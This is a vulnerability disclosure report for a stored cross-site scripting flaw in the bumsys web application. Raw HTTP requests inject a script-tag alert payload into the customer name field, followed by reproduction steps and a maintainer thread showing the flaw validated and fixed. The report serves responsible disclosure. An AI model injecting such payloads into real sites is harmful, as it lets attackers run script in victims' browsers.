Multiple XSS on update funtions with module select options and search form in unilogies/bumsys

Valid

Reported on

Mar 29th 2023


Description

XSS vulnerability occurs in forms have select and search

Proof of Concept

POST /bumsys/xhr/?module=peoples&page=updateCustomer HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------308170463032889995491505595073
Content-Length: 2215
Origin: http://localhost
Connection: close
Referer: http://localhost/bumsys/peoples/customer-list/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerName"

test2"><script>alert('edit')</script>
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerNameLocalLen"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerType"

Distributor
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPhone"

123
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerEmail"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerOpeningBalance"

11.00
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerShippingRate"

0.0000
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDiscount"

0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerSendNotification"

0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDivision"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDistrict"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerUpazila"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPostalCode"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerCountry"

Bangladesh
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerWebsite"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerAddress"

  
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customer_id"

3
-----------------------------308170463032889995491505595073--

Ajax Loader:

GET /bumsys/xhr/?module=my-shop&page=editDiscount&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/bumsys/my-shop/discounts/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Step 1. Create a new customer without payload alt text for screen readers View list customer alt text for screen readers
Step 2. Add a discount on My Shop alt text for screen readers
Step 3. Edit customer name alt text for screen readers View list customer after editor alt text for screen readers
Step 4. Edit discounts and view alert alt text for screen readers
Please check all funtion ajax module, html_entity_decode

Impact

In general, stored XSS occurs when an attacker injects malicious content (often referred to as the “payload”) as user input and it is stored on the target server, such as in a message forum, comment field, visitor log, database, etc.

When the victim opens the web page in a browser, the malicious data is served to the victim’s browser like any other legitimate data, and the victim ends up executing the malicious script once it is viewed in their browser.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
TuanTH modified the report
a year ago
TuanTH modified the report
a year ago
TuanTH modified the report
a year ago
TuanTH modified the report
a year ago
TuanTH modified the report
a year ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back a year ago
Khurshid Alam validated this vulnerability a year ago
tht1997 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
TuanTH
a year ago

Researcher


Can you assign a CVE for this vulnerability please? It would be very nice

Khurshid Alam
10 months ago

Thank you. we are working with some functionality. We will update soon. Thanks

Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f 10 months ago
Khurshid Alam has been awarded the fix bounty
This vulnerability has now been published 10 months ago
ajax.php#L543-L610 has been validated
ajax.php#L1209-L1253 has been validated
ajax_select2.php#L677-L706 has been validated
ajax.php#L78-L178 has been validated
ajax.php#L2158-L2208 has been validated
Khurshid Alam
10 months ago

@admin, please assign a CVE.

Pavlos
10 months ago

Admin


ok :)

to join this conversation